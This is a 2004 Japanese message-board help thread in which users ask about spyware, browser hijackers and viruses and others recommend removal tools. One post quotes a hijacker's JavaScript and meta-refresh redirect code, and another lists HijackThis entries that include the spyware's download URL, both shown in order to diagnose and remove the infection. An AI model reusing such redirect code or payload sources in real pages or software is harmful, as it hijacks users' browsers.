209 :名無しさん@お腹いっぱい。:04/06/16 22:43
>>205.207
どうもです。
スキャンしてみたんですが大量に・・・
ネットも大変ですね。

210 :名無しさん@お腹いっぱい。:04/06/16 23:39
漏れんとこのPCもスパイウエアにやられてる。
こうなる原因はなんですか?

211 :名無しさん@お腹いっぱい。:04/06/16 23:51
>>210
おまい自身。

212 :名無しさん@お腹いっぱい。:04/06/17 00:11
>>210
エロサイト、2chのリンク、雑誌のおまけCD

213 :名無しさん@お腹いっぱい。:04/06/17 00:21
>>212
IE

214 :名無しさん@お腹いっぱい。:04/06/17 00:43
>>213
そだった。IEじゃなければ大丈夫だった。
Opera(Java&JS切り、キャッシュ&クッキー即消し)とか
もっとショボいテキストブラウザ使ってればスパイの入り込む方法がない。

215 :名無しさん@お腹いっぱい。:04/06/17 02:59
どなたか詳しい方助けて下さい。↓のリンクが怪しいか調べて頂けるでしょうか・・・
http://www.wt-tag.com/edmonton (アダルトではなく国内の旅館検索でペンションのリンクです)
ここを開いたら英語のmsgが出て、次に別ウインドウも表示され、最後はインストールしますか?はい・いいえ が表示されました。
慌てて全て閉じました。デスクトップ上に閉じられないウィンドウはありませんがスパイウェアなど入れてしまったのでしょうか。
このような状態は初めてなのでとても不安です。今後、国際電話に繋がってしまう危険などあるか心配です。
どのように対処すべきか教えて下さい。

216 :名無しさん@お腹いっぱい。:04/06/17 03:03
>>215

踏むな

217 :名無しさん@お腹いっぱい。:04/06/17 03:25
>>216
罠じゃありません…。
普通の日本の宿検索のリンクだったので、怪しいリンクなのかも判断出来ずここへ来ました。
判断できる方いらっしゃいましたら教えて下さい。無知ですみません。

218 :215:04/06/17 03:29
追記。
みなさんが言っていれような、デスクトップに消えないウィンドウやタスクバーの検索ボタンはありません。
いつもと変わらない状態に見えます。オンラインスキャンも検出されませんでした。

219 :名無しさん@お腹いっぱい。:04/06/17 03:45
>>215
java切って踏んだが、永遠にこのMETAが繰り返される。
自分自身をインターバル0で呼び出す、マトモなサイトでないのは確実。

<SCRIPT LANGUAGE=javascript>
function ChangeToPopCat(){
var strTemp;
var strPort;
strTemp = "http://is.netster.com/Index.asp?Site=d3QtdGFnLmNvbQ%3D%3D";
top.location.replace(strTemp);
}
ChangeToPopCat();
</SCRIPT>
<meta http-equiv=Refresh content="0; URL=is.netster.com/Index.asp?Site=d3QtdGFnLmNvbQ%3D%3D">

220 :215:04/06/17 04:02
>>219
ありがとうございます涙!まともじゃないですか…。
可能性としては何かインストールされたとか、どんな事が考えられるのでしょうか。
Winのファイル検索で、今日作成されたファイルで検索してみたのですがexeファイルはありませんでした。
初期化した方がいいでしょうか。あと、ADSLですが国際電話に繋がる危険はありますか?

221 :名無しさん@お腹いっぱい。:04/06/17 08:45
>>220
まずはここの>>1以下のテンプレを読んでウイルス、スパイウェアのチェックをしてこい。


222 :名無しさん@お腹いっぱい。:04/06/17 08:50
おっとオンラインスキャンはしてるのか(アンチウイルスはインストールしてないのか?)
とりあえずAd-awareとSpybotを入れてスパイウェアのチェックを。

223 :名無しさん@お腹いっぱい。:04/06/17 10:08
>>215
http://www.pestpatrol.com/pestinfo/n/netster_smart_browse_toolbar.asp


224 :質問です:04/06/17 12:37
ツールバーのホームページを押すとyahooにしてなっているはずが何時の間にか
白い空白で出てくるようになることがある。
=インターネットオプションのホームページの項目が「about:blank」ってのになってる。

インターネット(ネットサーフィン)をしているさい中、
ツールバーのバックをクリックするなどして前に開いてたページに戻そうとしたり
(普通の)別のページを開こうとすると、「このプログラムは不正な処理を行なっ
たので強制修了されます。〜〜」というのがウィンドウが閉じられてしまいます。
変なホームページ開けちゃってctrl+alt+delでページの強制終了
(ビジー状態になってた)してから、数年間何も問題なくきてたのに、
こんなになってしまいました。

spybotで問題部分が検出されて修正・削除できている
はずなんですけど、何度やっても消えないで問題部分として
出てくるところがあります。
以下のものです。

DSO Exploit
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet.settings\Zones\0\1004!=W=3

WebDialer
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\HOMEOldSP

(今回はもうひとつ増えてDoubleClickってのが 検出されました。)

上の2つはspybotの「問題箇所を修正削除」しても効き目ないみたいです。
放っておいて時間が経つとまた問題箇所がいくつか増えてる感じで、
また上記の症状が直ってません(時折キーボード自体が効かなくなることもあり、またPC切る時
切れる際FDが変な音立ててたりすることもあります)。

このような変な症状の改善策がわかる方いませんか、
どうすればこのようなものが直るようになりますか?

225 :名無しさん@お腹いっぱい。:04/06/17 13:00
>>224
これはどうよ?
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

226 :名無しさん@お腹いっぱい。:04/06/17 13:59
すみませんが教えてください。m(__)m
VBS_FREELINKに感染したらしいのですが、削除方法に困っています。
トレンドマイクロによると…
(1)Windowsメニューから「ファイル名を指定して実行」を選び、regeditと入力して、レジストリエディタを表示する。
(2)以下のレジストリエントリの値:Rundll データ:Rundll.vbsを削除する。
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 \CurrentVersion\Run
(3)\Windows\System ディレクトリの「RUNDLL.vbs」「LINKS.VBS」を削除する。

らしいのですが、レジストリのRundllにRundll.vbsという記載はありませんし、
Systemフォルダに中にも「RUNDLL.vbs」「LINKS.VBS」というファイルはありません。

手動でウイルス検索をかけてみても一切ウイルスは検知されず…。
それなのに起動するたびに「VBS_FREELINK」が発見されましたの警告アラートが
出ます。
このような場合、一体どうすれば良いのでしょうか。どうか教えてください。
(過去スレを見ようにも倉庫に収納されていて調べれずに困っています)
ちなみにOSはXP、セキュリティソフトはウイルスバスター2003です。
宜しくお願い致します。


227 :名無しさん@お腹いっぱい。:04/06/17 14:14
>>226
こっちは疑ってみた?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_ZULU.B
ちなみにIEのキャッシュは削除してる?それに反応している可能性もあるんじゃないかと。

228 :226:04/06/17 14:29
即レスありがとうございます。
どうやらご指摘のウイルス駆除法も当てはまらないようです。
IEのキャッシュが全て削除してある状態で再起動してもやはり「VBS_FREELINK発見」
と警告されます;;
ちなみにレジストリのRunDLLの部分のデータは以下の通りです。

rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load

なんか「bridge」の文字が危険な感じがするのですが…。

229 :名無しさん@お腹いっぱい。:04/06/17 14:43
>>228
Google先生に聞いてみた。
http://www.okweb.jp/kotaeru.php3?q=830837
http://www.symantec.com/region/jp/sarcj/data/a/adware.winfavorites.html

230 :名無しさん@お腹いっぱい。:04/06/17 14:45
>>228
bridge.dllはスパイウエアですね。
HijackThisを手に入れてきて次のエントリーをFixしてください。その後に本体を削除します。
O2 - BHO: (no name) - {9C691A33-7DDA-4C2F-BE4C-C176083F35CF} - C:\WINDOWS\DOWNLOADED PROGRAM FILES\CONFLICT.1\BRIDGE.DLL
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\DOWNLOADED PROGRAM FILES\CONFLICT.1\BRIDGE.DLL",Load
O16 - DPF: {9C691A33-7DDA-4C2F-BE4C-C176083F35CF} (brdg Class) - http://www2.flingstone.com/cab/98ME/bridge.cab

bridge.dllがあったということはスパイウエアに複数感染している可能性があります。
スパイウエアのスキャンもしてみて下さい。もちろんウイルスの治療も合わせて。

HijackThisのことやスパイウエアの情報はこちらへ
ttp://haiiro.info/my/text/template.html

231 :226:04/06/17 14:52
皆さん、ありがとうございます。m(__)m
早速「HijackThis」を使って削除したいと思います。
(が、今から外出しなくてはならないので実行は夜になります)
無事削除できたら報告に来ます。
本当にありがとうございました。

232 :名無しさん@お腹いっぱい。:04/06/17 17:40
ノートン先生でスキャンをしAdwere Main Searchに感染しているのですがそのファイルを
削除することができません。
そのファイルを直接削除しようとしても同じ状態になります。なぜなのでしょうか?

233 :名無しさん@お腹いっぱい。:04/06/17 17:47
>>232
プロセスで使用されているためです。
そのプロセスが分かれば終了してスキャンしてみるか、
セーフモードでスキャンしてみて下さい。
除去できる可能性があります。

234 :名無しさん@お腹いっぱい。:04/06/17 20:38
ソフトスレの2002で2chがNGで、2002がウィルス警告。

これって、ホント?、笑い話?
ちなみに、VBSインターナショナルとか云うやつ。

235 :名無しさん@お腹いっぱい。:04/06/17 20:48
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/

236 :名無しさん@お腹いっぱい。:04/06/17 21:00
安心しました。
愉快犯ですか?

237 :226:04/06/17 22:11
お蔭様で無事スパイウエアを削除できました。
どうもありがとうございました。(一応ご報告まで)

238 :名無しさん@お腹いっぱい。:04/06/17 23:11
最近インターネットも見てないのに、急にわけのわからんポップアップ広告が出てきて困っています。スパイウェア除去ソフトである
「ADWARE」でいくつか見つかり消しているのですが、また出てきます、何かよい対処法はないでしょうか?
よろしくお願いします。

239 :215:04/06/17 23:21
レスくれた方ありがとうございました。
Ad-awareで検索したところ一つだけ見付かり駆除しました。
ALEXA というものですがどんなプログラムなんでしょう。
オンラインスキャンとsafeでAd-awareは問題なしです。
Spybotもやったほうがいいでしょうか。
これをインストール後、トラブルが起きる場合があるみたいなのでインストールは迷ってます。

240 :名無しさん@お腹いっぱい。:04/06/17 23:35
戯れに、オンラインスキャンをしたら

C:\Program Files\Live2ch\log\tmp3.2ch.net\youth\1086218930.dat は VBS.LoveLetter.Var に感染しています。

とでたが、これはそのスレにウイルスのソースが書かれているだけで、
何の支障も無いよね、ね。

ちなみに、「メモリ上でウィルスは見つかりませんでした。」とでました。

241 :名無しさん@お腹いっぱい。:04/06/17 23:38
>240
ないよ。

242 :240:04/06/17 23:41
ありがとう(・∀・)_旦~~オチャドゾー

243 :名無しさん@お腹いっぱい。:04/06/17 23:55
>>239
スパイはいなそうですが実行するならそれだけじゃなく、

CoolWebShredder
ttp://www.spywareinfo.com/~merijn/downloads.html
Spybot-S&D
ttp://www.safer-networking.org/

Spybotはモードの欄で、アドバンス(日本語になっていれば高度なモード)に切り替えて
左下のツール欄をえらびます。右にアイコンが表示されたら全てにチェックします。
この3点をセーフモードで実行した方が効果は高いです。

SpybotはDSO Exploitの問題を何度も検出されると思いますが無視でオッケーです。
ttp://higaitaisaku.web.infoseek.co.jp/dso.html

ALEXAはAd-awareインストール時の動作実験用ファイルなので、無問題です。

244 :名無しさん@お腹いっぱい。:04/06/18 00:49
>>243
的確なアドバイスありがとうございます。
明日、2つのソフトで試してみます。
検出されたファイルが無害のようで安心しました。

245 :215:04/06/18 00:52
↑244=215です。すいません。

246 :名無しさん@お腹いっぱい。:04/06/18 00:58
これは何ですか?

ttp://gb.bbs.ws/book.php?book=xtrime


247 :名無しさん@お腹いっぱい。:04/06/18 04:08
2ちゃんに書きこむと、鯖管理者にIPバレると思うのですが、
鯖管理者がそのIPでPC内のファイルを見たりする事って出来るんですか?
ちなみに、セキュリティ対策は本当に何もしていません

248 :名無しさん@お腹いっぱい。:04/06/18 04:48
なんかデスクトップが真っ黒になってて「WARNING YOUR IN DANGER」
とかでて、英語で警告文が出てます。

ノートンで検出されたファイル等を消しても変わらないんですが、どうすればいいんでしょうか。

249 :名無しさん@お腹いっぱい。:04/06/18 05:02
>>248
>>129>>155と同じ症状だったら彼らへのレスを参考に。
あと、この辺↓も参考になるかもしれない。
ttp://higaitaisaku.web.infoseek.co.jp/
ttp://haiiro.info/my/text/template.html

250 :名無しさん@お腹いっぱい。:04/06/18 05:10
>>247
まずありえない。

OSにもよるが、なにもセキュリティしてないってことは
余計なこと(telnetやFTPの鯖を立ててるとか)もしてないはずなのでまず大丈夫。
できたとしてもそれは十分犯罪行為なので
マトモな管理者がそんなことをするとは思えない。

251 :名無しさん@お腹いっぱい。:04/06/18 06:08
>>247
そもそも2ちゃんに限らず、ネットで通信をすれば相手はあなたのIPが判る。

252 :名無しさん@お腹いっぱい。:04/06/18 06:42
>>247
勝手に「ネット=匿名」と思い込んでいる人を発見しますた


253 :名無しさん@お腹いっぱい。:04/06/18 10:17
>>247
インターネットに繋いでいる以上、無作為にやってるアホの攻撃にさらされる可能性がある。
ZoneAlarmでも良いから、PFW入れてみな。結構な割合で色々な所からポートスキャン食らってる事が分かるから。
ワームも無作為に接続してこようとするしな。
鯖管理者からの攻撃を心配するよりも、そちらから攻撃を食らう危険の方がはるかに深刻。
悪い事言わないから、セキュリティ関連ソフトは入れておけ。

254 :名無しさん@お腹いっぱい。:04/06/18 10:28
WindowsNTやWindows2000の頃あった、
「C$」とか「D$」のような便利な共有名は
WindowsXP以降のOSには無いのでしょうか?

管理する目的で使用したのです。

誰か教えて下さい。

255 :名無しさん@お腹いっぱい。:04/06/18 11:04
ttp://www.mainichi-msn.co.jp/shakai/wadai/news/20040616k0000e040072000c.html
↑こんな記事が出てますけど、これってただのSnifferって事ですか?

256 :名無しさん@お腹いっぱい。 :04/06/18 11:29
どなたか助けてください。IEを、起動するといつもならOCN画面なのに
Warningっていう青い画面になっていろいろ英語が、ならんでてすぐに
大画面のアダルトサイトに、飛ばされます。スパイウエアーかなと思い
ad-awareで駆除してもIEを、起動するとまた出てきます。
親と共同なので非常にヤバイんです。初心者ですが誰か助けてください

257 :名無しさん@お腹いっぱい。:04/06/18 12:02
>>256
IEのインターネットオプションでホームページ変更しろ。

258 :名無しさん@お腹いっぱい。:04/06/18 12:08
>>256
>親と共同なので非常にヤバイんです
坊や、(ry

259 :名無しさん@お腹いっぱい。:04/06/18 12:21
>>257
変更して戻しても、起動するとまた戻ります

260 :名無しさん@お腹いっぱい。:04/06/18 12:28
>>256
まあ、>>1も読めないようじゃネタ回答しか返ってこないやね。

261 :名無しさん@お腹いっぱい。:04/06/18 15:07
>>256
「いろいろ英語が」って時点でアウト。
読め。辞書とにらめっこしながらでもイイから。

262 :名無しさん@お腹いっぱい。:04/06/18 15:22
Norton先生(アンチウイルスだけ)とウィルスバスターと、どっちが軽いですか、

両方とも2004の場合、

263 :名無しさん@お腹いっぱい。:04/06/18 15:54
>>256
すまんが君のスキルからいって修復は不可能だ。
ただそのwarningの画面の下の方にremoveのしかたとかなんとかと書いてあるところがあるだろ。
そこをクリしてなんて書いてあるか見てくれ。

264 :名無しさん@お腹いっぱい。:04/06/18 16:20
海外サイトを開いてたらブラクラしてしまって
それ以来、ユーザーTEMPフォルダに sp.html というのが勝手に作成されます
これをご存じの方がいましたらどうか教えてください

265 :名無しさん@お腹いっぱい。:04/06/18 16:22
WinXP使用です。
Documents and Settingsで、フォルダのユーザー名として
自分の名前が入っています。
この名前を変更することはできないとなっているのですが、
再セットアップをする以外に変更する方法はありますか?

クッキーが(例)suzuki@www.amazon.〜となっていますが、
ページを見たことによって自分の名前が相手先に伝わってしまうということは
考えられるでしょうか?よろしくお願いします。

266 :名無しさん@お腹いっぱい。:04/06/18 16:35
>>265
新規ユーザ作成。

>ページを見たことによって自分の名前が相手先に伝わってしまうということは
クッキーは、そのサイトのみ有効で、他所のサイトから読み取ることはできない。


267 :名無しさん@お腹いっぱい。:04/06/18 16:35
>>250
この鯖ではないのですが、常駐板の管理人らしき人が気に入ってる女に気に入られているのが
問題らしく、粘着されていて、名無しで書き込んでも俺だという事をバラされ、煽り出されます。
悔しいのでIPを変更して潜んでいてもバレるのです。PCの内部を見られて認識してるとしか思えないんですよ。
>>253
上記の事が良く行われるようになってからセキュリティ板を見るようになったのですが、
それらのものを入れればPC内部のファイルを見る事は避けられますか?
IPやプロバイダの情報くらいはバレても別に良いのですが、中身を見られてる恐怖がぬぐえません。
誰も知らない俺の個人情報(PC上に保存している)をいきなり言い当てられたりと、やっぱり見てるとしか思えない事があるんです。

268 :名無しさん@お腹いっぱい。:04/06/18 16:37
すみません。ちなみに
ttp://oz.msie.tv/search.php
へジャバスクリプトを使って大量にサーチするファイルのようなのですが、
消しても消しても、エクスプローラを開くと作成されてしまいます。
sp.htmlが作成されるだけで、他に障害はないのですが、作成させないように
するためにはどうしたらよいのでしょうか
よろしくお願い致します

269 :名無しさん@お腹いっぱい。:04/06/18 16:41
>>267
…心療内科へどうぞ。

270 :名無しさん@お腹いっぱい。:04/06/18 16:47
>>266
ありがとうございます。新規ユーザでやってみます。
ということは、鈴木がアマゾンのサイトを見たということは
アマゾンのサイト管理者にはわからないということですね。
ありがとうございました。

271 :名無しさん@お腹いっぱい。:04/06/18 17:08
>>267
PFWとアンチウイルスソフト、スパイウェア対策ソフトを早急に入れなさい。
そこまで心配しているなら一通り対策するべきだ。
一番良いのは一度リカバリしてからセキュリティ関連ソフトを入れること。
その際、WindowsUpdateも忘れずに。

272 :名無しさん@お腹いっぱい。:04/06/18 17:36
ノートン先生を起動するとSpyware Detectedと書かれたウインドウがでてきて
IPが表示されるのですがSpyabotSeach&Destrを使って駆除しても
出てくるのですがなにか解決方法ないでしょうか?

273 :名無しさん@お腹いっぱい。:04/06/18 17:53
>>271
そうですね。それで防げたらいいです。
ところで、[ファイル名をしてして実行]→winipcfg.exeを実行でIPアドレスが見れると
ここのログに書いてあったのですが、IPアドレスの欄を見ればいいのですか?
IP変えてるつもりが、いつも同じ値です。
でも、PPPの再起動をすると、2ちゃんのIDも変更されるのでそれでIPが変更されてると思ってたのですが、
もしかしてずっと固定のIPを使ってるということですか?

274 :名無しさん@お腹いっぱい。:04/06/18 18:14
>>273
ローカルIPとグローバルIPを間違えている気がする…
これ以上は板違いなんで、別の場所で聞いた方が良いかもしれん。

275 :名無しさん@お腹いっぱい。:04/06/18 18:44
マルチユーザ環境下で、外付けハードディスク内のデータを他のユーザーから
アクセスされないようにするにはどうすればいいでしょうか?
XP Home SP2 です。

調べてみたら、フォルダのプロパティ>共有タブ>このフォルダをプライベートにする
というメニューをチェックすればいい(XP Homeではセーフモードにする必要あり)
と分かったので、セーフモードにしたのですが、当然ながら?セーフモードでは
外付けハードディスクも認識してくれないため、設定が出来ませんでした。

外付けハードディスク内で Documents and settingsフォルダのように
ユーザごとの管理をする方法があれば教えて下さい。

276 :名無しさん@お腹いっぱい。:04/06/18 18:47
>>256
まずは、

IEのツールからインターネットオプション

インターネット一時ファイルでクッキーの削除、ファイルの削除を実施。

msなんとか.exeを消すんだが・・・忘れた。


277 :名無しさん@お腹いっぱい。:04/06/18 18:50
>>275
cacls
UniCacls.exe
UniChown.exe

278 :名無しさん@お腹いっぱい。:04/06/18 18:53
>>274
わかりました
ありがとうございます

279 :名無しさん@お腹いっぱい。:04/06/18 18:59
>>271
グローバルIPはユーザーが自由に変えられるようなものではない。
接続しなおして変わるのはせいぜいIPの下1桁か2桁。
ドメインネーム(IPの上2、3桁)までは変わらないので、ドメインでバレてるんだと思う。
漏れてない串組んでカキコすればたぶんバレない。
その板が串規制してたらアウトだけど。
PPPとか言ってるってことはMacユーザー???

280 :名無しさん@お腹いっぱい。:04/06/18 19:05
>>271
ああ、2chなら、単純にクッキー食っててそれで識別されてるのか。。。
串組んでクッキーOFFでGO!

スレ違いらしいので、これでおしまい。

281 :名無しさん@お腹いっぱい。:04/06/18 19:07
>>279
そうですね、グローバルと呼ばれているのも数種類くらいは用意されているのですが、
切りかえると下2桁だけが変わることもあります。
どっちにしても、その人はやっぱりIP見てるって事ですよね?
普通の人にIPが抜けるか分からないので、やっぱり管理者の嫌がらせとしか思えません。
使える串一覧みたいなもので色々試してみましたが、残念ながら使えるのはありませんでした。

282 :名無しさん@お腹いっぱい。:04/06/18 19:11
>>280
すれ違ってしまった。。。ちょっと書き込みの意味が分かりません。
どのスレで質問すればいいんだろう。。。

283 :名無しさん@お腹いっぱい。:04/06/18 19:24
>>262はスルーされていますがなぜですか?

284 :名無しさん@お腹いっぱい。:04/06/18 19:28
>>282
単純にクッキーオフにするか、「窓の手」使ってユーザー名を変えると
いいかも。やってみる価値はあるよ。
http://www.asahi-net.or.jp/~vr4m-ikw/
http://ringonoki.net/tool/kaizou/mado.html

因みに2chは原則串禁止だから・・。

285 :名無しさん@お腹いっぱい。:04/06/18 19:30
>>262
AVGが一番軽い。

286 :名無しさん@お腹いっぱい。:04/06/18 20:00
>>275
うそつくな!
XPでは、セーフモードでもUSB2.0などの外付けハードディスクでもきちんと認識できる。
ちなみに、回復コンソールでも認識する。
認識できないのは、9x系。

287 :268:04/06/18 20:13
システムの復元は嫌だったのですが、これで問題なくなりました

書き忘れたのですが、Windowsアップデートを実行すると
そのsp.htmlを作成してると思われるプログラムがWindowsアップデートの
一部かのようにポップアップウィンドウを出し
「スパイウェアがある疑いがあります。以下のサイトで無料で診断出来ます」
とかいろんなタイプの同じような広告を出します

これって一体なんなんですか?いったい何がおもしろくてこんな事を
仕掛けるのでしょうか

288 :名無しさん@お腹いっぱい。:04/06/18 20:14
どうやらスパイウェアに入り込まれていた模様;;
駆除には成功したものの、勝手にインストールされた「Search the web」なる物が
邪魔で困っています。
タスクバーに勝手に常駐して押すと国外のサーチエンジンをIEで表示するというもの。
スタートアップメニューに入っているわけではないので単独のソフトでは無さそうです。
どなたかこの現象を解決する方法をご存知ないでしょうか?
ちなみにOSはXPです。よろしくお願いします。

289 :名無しさん@お腹いっぱい。:04/06/18 20:25
>>288
誰でも知っている。お前が知らないだけ。無知?

290 :名無しさん@お腹いっぱい。:04/06/18 20:25
>>284
ダウンロードしてみましたが、ユーザー名ってシステムの登録名の事でしょうか?
だめだ、どこかで聞いてみます、すいません、ありがとうございました。

291 :名無しさん@お腹いっぱい。:04/06/18 20:33
>>290
そうです。これで出来るはずです。私は変更した事が無いので断言できませんが。
あと、詳しい事はこちらへ。
ソフトウェア板【窓の手】
http://pc5.2ch.net/test/read.cgi/software/1084680097/l50

292 :名無しさん@お腹いっぱい。:04/06/18 20:36
>>291
リンクまで貼って貰ってありがとうございます。

293 :名無しさん@お腹いっぱい。:04/06/18 20:44
>>292
これもご参考に。
http://homepage3.nifty.com/tef-room/tips/xp-account.html
ここまでにしますね。

294 :名無しさん@お腹いっぱい。:04/06/18 20:46
>>291
ちょっと待って、システムの登録名を変更するとどう状況が
好転するのかイマイチわからないのだが?
それに、267のOSが何なのかわかんないけど、
仮にXP等マルチユーザー環境なら新規ユーザーを作成して
ログインすればほぼ同じことなのでは?

別にイチャモンつけてるわけではないので気を悪くされたらゴメン。

295 :名無しさん@お腹いっぱい。:04/06/18 20:49
>>293
サンクスです。XPの説明っぽいですね。
>>294
OSは、98SEです。

296 :288:04/06/18 21:01
>>289
「無知=知らない」とするならば知らないから訊いているわけでして…。
289の言う通り「誰もが知っている」のなら誰か教えていただけませんか?

297 :名無しさん@お腹いっぱい。:04/06/18 21:11
>>288
そーゆーマトモに取り合ってもらえないレスをもらった場合は、たいていFAQ。
つーか、数行上に同じような質問がいくつもある。
異常事態でパニクってるのもわかるが、少し落ち着いて上から読んでみるといい。

298 :268:04/06/18 21:16
>>296
自分と似てるけど違うみたいだね
msconfigやレジストリのRUN項目を見れば、プログラムの場所が分かるかも
自分のは全く分からなかったので復元しました
セーフモードで削除すれば良いと思う

299 :288:04/06/18 21:29
やっと解決しました。皆さんお騒がせしました。
どうも他人のPCだと初歩的な事もわからないものですね。
自分はXPではなかったもので。

300 :名無しさん@お腹いっぱい。:04/06/18 23:22
>>277
なんとか設定出来ました。
ありがとうございました。

>>286
嘘も何もXP Homeで現実に認識出来なかったんだけど。
USBなら出来るのかな?
漏れはLogitec LHD-EA160FU2 をFireWireで接続してたからダメだったのかもね。

301 :名無しさん@お腹いっぱい。:04/06/18 23:35
ノートンアンチウイルスを使ってウイルス感染を調べていたんですが
感染が見つかっているのに数個だけ駆除されずに残っています
そういう場合はどうすればいいのでしょうか?

302 :名無しさん@お腹いっぱい。:04/06/18 23:36
そんなぐらいの情報で判断できるか!

303 :名無しさん@お腹いっぱい。:04/06/18 23:44
>>301
感染ファイルがあるドライブとフォルダ名をメモしておいて
safeモードでPCを起動してそのファイルを削除してみれば?

304 :名無しさん@お腹いっぱい。:04/06/18 23:46
PCについてあまりよくわからないのでなんといえばいいのかわからないのですが
同じウイルスに感染しているのに駆除できたり削除したり残ったりしています
残ってるウイルスをどのように駆除すればいいのか教えてもらおうと書き込みしました
多分情報不足だと思います。どんな情報をを書き込めばいいのかも教えてください
まったく素人ですいません

305 :名無しさん@お腹いっぱい。:04/06/18 23:50
>>304
それは何というウイルスですか?

306 :名無しさん@お腹いっぱい。:04/06/18 23:50
使ってるOSもウイルス名も書かないとは

307 :名無しさん@お腹いっぱい。:04/06/18 23:53
>>304
アンチウイルスの種類も解らないからなんとも言えんが・・。
そのウイルスを検索、各社ウイルスデータベースで特定して単に削除でイイのか、
レジストリの修正を必要とするのかを見極めた上、エクスプローラ他で
ダイレクトディレートで良いと思います。

308 :名無しさん@お腹いっぱい。:04/06/18 23:56
OSはXPです
ウイルス名はW32.Pinfiでした
よろしくお願いします

309 :名無しさん@お腹いっぱい。:04/06/18 23:57
>>308
http://www.symantec.com/region/jp/sarcj/data/w/w32.pinfi.html
だんだんやってて虚しくなるよ〜

310 :名無しさん@お腹いっぱい。:04/06/19 00:05
どのブラウザ立ち上げても(Regnessemまでも)Search Forっていうサイトが表示されて
(アドレスバーはabout blankのまま)スパイウェアがどうのこうのっていう英語のPOPが出ます。
これってウイルスとかスパイウェアの仕業ですか?>>1にある
http://haiiro.info/my/text/template.html
のやつですか?

311 :名無しさん@お腹いっぱい。:04/06/19 00:15
対処法みつかりました。すいません。

312 :名無しさん@お腹いっぱい。:04/06/19 00:15
>>302-309
ありがとうございました
駆除の方法やウイルス対策などたくさんあるんですね


313 :名無しさん@お腹いっぱい。:04/06/19 00:18
>>310
ウィ!
あと、ここも見てみるといい。
ttp://higaitaisaku.web.infoseek.co.jp/

314 :名無しさん@お腹いっぱい。:04/06/19 15:15
TDA-1.5.19.59-install-JP

315 :名無しさん@お腹いっぱい。:04/06/19 18:26
初めてSpybot1.3でスキャンしたところ、DSO Exploitが検出されました。
バグがあるため修正は行わないようにと記載がありましたが、
このファイルは放っておいても良いのでしょうか。

316 :名無しさん@お腹いっぱい。:04/06/19 18:37
http://downloads-mp3.net/saved/sony+vegas+5.html


317 :名無しさん@お腹いっぱい。:04/06/19 18:50
シマンテックオンラインウイルススキャンはスキャンフォルダの設定はおろか
ドライブの指定もできず若いアルファベットから順にスキャンする以外の方法は無いのでしょうか?
ちょっとスキャン止めて後で場所指定してスキャンしようと思ったら
どこにも設定する場所が見当たらなかったです

318 :名無しさん@お腹いっぱい。:04/06/19 19:01
初めまして、今日hotmailのほうに、System Anti-Virus Administratorというところから、
「あなたの送ったメールからウイルスが発見されました」というメールが来ていて、そのメールによると、
Worm.SomeFool.Gen-1というウイルスが発見されたようです。でも、そのメールの送信先というのが、
全く見に覚えのないメールアドレスだったのですが…心配になり、トレンドマイクロでオンラインスキャン
した後に、セーフモードでavast!でウイルススキャンしてみましたが、何も発見されませんでした。
誰かが、私のメールを不正利用しているのでしょうか??
OSは windows XPSP2 IE6 dynabookを使っています。ネットへはダイヤルアップ接続です。


319 :名無しさん@お腹いっぱい。:04/06/19 19:13
>>318
いい加減Netskyの基本的な概要くらい覚えてくれよ

320 :名無しさん@お腹いっぱい。:04/06/19 19:14
WindowsXPです
Ad-awareというスパイウェア検出ソフトで定期的にファイルをチェックしているのですが
その度にいつもTracking Cookieというものが検出されます。
ウィルスチェックはアップデートも定期的にやっているのですが検出されず
出所がよく分かりません。
これは危険なんでしょうか、大丈夫なんでしょうか?

321 :名無しさん@お腹いっぱい。:04/06/19 19:20
>>320
気になるなら必要なクッキー以外は食べない設定にすれば良い。
この意味がわからなければ気にする必要無し。

322 :名無しさん@お腹いっぱい。:04/06/19 20:45
>>321
その設定はどうやったら出来るんですか?
ちなみに320ではないです。

323 :名無しさん@お腹いっぱい。:04/06/19 20:55
>>322
ツール→インターネットオプションを隅まで調べろ。

324 :名無しさん@お腹いっぱい。:04/06/19 21:43
NETサーフィンしてたら

インターネットの起動画面がおかしいんです。
タスクバーの下にもう1つ 小さなアドレス表示の欄が出て
その右に 英語で「topserches][datinng][shopping][practical][travel]
などのボタンが出てきました。
起動画面が 外国のものになっていたのでそれは
変えれたのですが その変な表示は消えません。
どうしたらいいでしょうか?
OSは98SEです。


325 :名無しさん@お腹いっぱい。:04/06/19 21:49
WindowsのXPを使ってるのですが
突然シャットダウンしてしまいます
それで>>1の動作がおかしいって所から
セキュリティーのやつをインストールしてきたのですが
まだ直ってません
どうしたらいいのでしょうか?

326 :名無しさん@お腹いっぱい。:04/06/19 22:08
>>325
ウイルスを駆除したの?

327 :名無しさん@お腹いっぱい。:04/06/19 22:27
マイクロソフトセキュリティ0120690196岡田氏曰く
IEの脆弱性及びOEの脆弱性に係わる事は
セキュリティの窓口では受け付けないとの事。
当窓口は修正パッチの案内及び他社ウイルスソフト、
ファイアウォール、ルーター導入の案内のみと主張。
他には何も無いのかと詰め寄った所、何を逆切れしたのか
じゃあ、いってやろか!とのたまい、修正パッチCDの配布を上げました。
住所氏名を公開した後郵送だそうですが何れにせよ
マイクロソフトの主張するセキュリティの定義は稚拙であり
私の頭では理解出来る許容を超えた所に有る様です。

328 :名無しさん@お腹いっぱい。:04/06/19 22:48
変なソフトが 入り込んだと思って アプリケーションの削除でkそれらしきものを
削除して 再起動したらSAFEモードみたいに色がぐちゃぐちゃで 大きなアイコンのままです.
ctrlのキーを連打して 確かめても ちゃんとノーマルになっています。
どうしたらいいのでしょうか。

329 :名無しさん@お腹いっぱい。:04/06/19 22:55
>>328
画面のプロパティを確認

330 :名無しさん@お腹いっぱい。:04/06/19 23:17
教えてください。

OS→Win2000
ウィルスソフト→ウィルスバスター
Ad-aware 6.0、Spybotも使用しています。
ブラウザ→IE

最近、ネットをしていて次のページへのリンクをクリックする際に
「もう一度更新ボタンを押すか、ネットワークの接続を確認してください」みたいな
エラーメッセージ(Cドライブからのメッセージの奴です)が表示されます。
そのメッセージが表示されると約5分くらいはどのページに移ろうとも、
ブラウザを再起動しようともそのエラーが表示されます。

